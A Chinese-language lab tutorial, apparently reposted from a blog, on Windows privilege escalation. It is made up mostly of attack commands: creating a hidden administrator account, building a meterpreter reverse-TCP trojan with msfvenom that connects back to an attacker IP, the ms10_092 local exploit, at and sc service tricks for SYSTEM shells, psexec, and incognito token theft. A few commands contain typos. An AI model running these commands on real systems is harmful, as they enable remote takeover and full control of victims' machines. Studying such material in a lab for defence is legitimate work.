提權(quán)目的
提高自己的執(zhí)行權(quán)限,已完成更多高權(quán)限才擁有的特權(quán)
提權(quán)常用命令
whoami #查看當(dāng)前用戶權(quán)限
systeminfo # 查看操作系統(tǒng)及補(bǔ)丁情況
ipconfig #查看ip
net user #查看當(dāng)前用戶情況
netstat #查看當(dāng)前網(wǎng)絡(luò)連接情況(只有tcp)
netstat -ano #顯示出tcp和udp連接情況
netstat -an | find “ESTABLISHED” #查看開啟狀態(tài)下的網(wǎng)絡(luò)情況
tasklist #進(jìn)程列表
taskkill -pid xxx #停止進(jìn)程
net start #啟動(dòng)進(jìn)程
net stop #停止進(jìn)程
net user best 123456 /add #添加用戶名為best 密碼為123456的用戶
net localgroup administrators best /add #將用戶名為bast的用戶添加到管理組
net user best /del #刪除best用戶
提權(quán)實(shí)戰(zhàn)
常見的payload利用
KB2592799
KB3000061
KB2592799
1. 安裝虛擬機(jī)win2008和kali
具體安裝步驟詳見
https://blog.csdn.net/qq_41158271/article/details/127029119?spm=1001.2014.3001.5501
2. 創(chuàng)建普通用戶
net user 用戶名 密碼 /add #創(chuàng)建用戶
net user #查看已有用戶
3. 切換用戶
4. kali生成木馬并發(fā)送到被攻擊服務(wù)器上
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.107 LPORT=4444 -f exe>shell.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.107
exploit
具體使用方法詳見https://blog.csdn.net/qq_41158271/article/details/130362377?spm=1001.2014.3001.5502
5. 被攻擊方運(yùn)行生成的木馬文件
6. 查看監(jiān)聽是否連接成功并查看權(quán)限
7. 查看可利用漏洞
方法一:
run post/multi/recon/local_exploit_suggester #查找可識(shí)別的漏洞
方法二:
run post/windows/gather/enum_patches #查找未打補(bǔ)丁的漏洞
方法三:
使用wes或windowsVulnscan工具對(duì)比systeminfo信息查找未打補(bǔ)丁的漏洞(與方法二原理一致)
下載地址:https://github.com/bitsadmin/wesng
8. 嘗試?yán)胑xp提權(quán)
嘗試使用此漏洞提權(quán)
backgroud #切換到后臺(tái)
show sessions #查看存在的會(huì)話
search ms10_092 #查找ms10_092漏洞可利用payload
use exploit/windows/local/ms10_092_schelevator #使用payload
show options #展示設(shè)置選項(xiàng)
set LHOST 192.168.0.107
run #運(yùn)行
》》我這里未成功提升權(quán)限,具體步驟為上述步驟
at/sc/ps命令提權(quán)
at命令提權(quán)
at xx:xx /interactive cmd.exe
當(dāng)使用at命令設(shè)置定時(shí)計(jì)劃后,執(zhí)行時(shí)將會(huì)使用system權(quán)限運(yùn)行,僅適用與win2007之前發(fā)布的系統(tǒng)
本次實(shí)驗(yàn)系統(tǒng)為win2003
sc命令提權(quán)
sc Create syscmd binPath = "cmd /k start" type= own type= interact #先創(chuàng)建服務(wù)
sc start syscmd #運(yùn)行服務(wù)
適用于win7之前系統(tǒng)
ps命令提權(quán)
前提條件:需下載PsTools
下載地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools文章來源:http://www.zghlxwxcb.cn/news/detail-462264.html
psexec.exe -accepteula -s -i -d cmd.exe
令牌竊取提權(quán)
限制條件:win2008或2003之前版本文章來源地址http://www.zghlxwxcb.cn/news/detail-462264.html
use incognito
list_wokens -u
impersonate_token "NT AUTHORITY/SYSTEM" #""中為令牌號(hào)
到了這里,關(guān)于【網(wǎng)絡(luò)安全】--win提權(quán)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!